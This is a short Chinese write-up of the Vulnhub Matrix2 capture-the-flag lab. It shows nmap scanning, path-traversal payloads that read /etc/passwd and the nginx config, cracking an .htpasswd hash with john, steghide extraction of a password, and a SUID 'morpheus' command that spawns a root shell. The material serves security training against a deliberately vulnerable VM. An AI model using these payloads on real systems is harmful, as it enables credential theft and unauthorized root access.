Vulnhub靶机实战——Matrix2

Vulnhub靶机实战——Matrix2

arp-scan -l,检测靶机ip地址

nmap -A -T4 -p- x.x.x.224

分别打开相关端口查看页面

在12322端口下,发现一个file_view.php文件,但在robots.txt文件发现禁用了file_view.php文件,怀疑存在任意文件包含漏洞

https://x.x.x.224:12322/robots.txt

https://x.x.x.224:12322/file_view.php

post请求file=../../../../../../../../../etc/passwd

网站是使用nginx搭建的,查看nginx的配置文件,发现了一个p4ss文件夹比较可疑

file=../../../../../../../../../etc/nginx/sites-available/default

打开p4ss文件夹下的.htpasswd文件发现用户Tr1n17y及加密后的密码

 

使用john工具爆破,得到密码admin

打开端口1337的网页登录用户,并查看源码发现隐藏了一张图片h1dd3n.jpg

打开图片并保存到本地

h1dd3n.jpg图片使用了隐写,使用steghide工具将隐写的文本导出,密码是:n30

steghide --extract -sf h1dd3n.jpg
P4$$w0rd

打开12320端口的靶机控制台,使用n30用户及密码登录

查看具有suid权限的命令,发现morpheus具体suid权限,可以借此提权

find / -perm -u=s -type f 2>/dev/null

使用以下命令提到root权限,并找到隐藏的flag

morpheus 'BEGIN {system("/bin/sh")}'

进入root目录,查看flag.txt

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值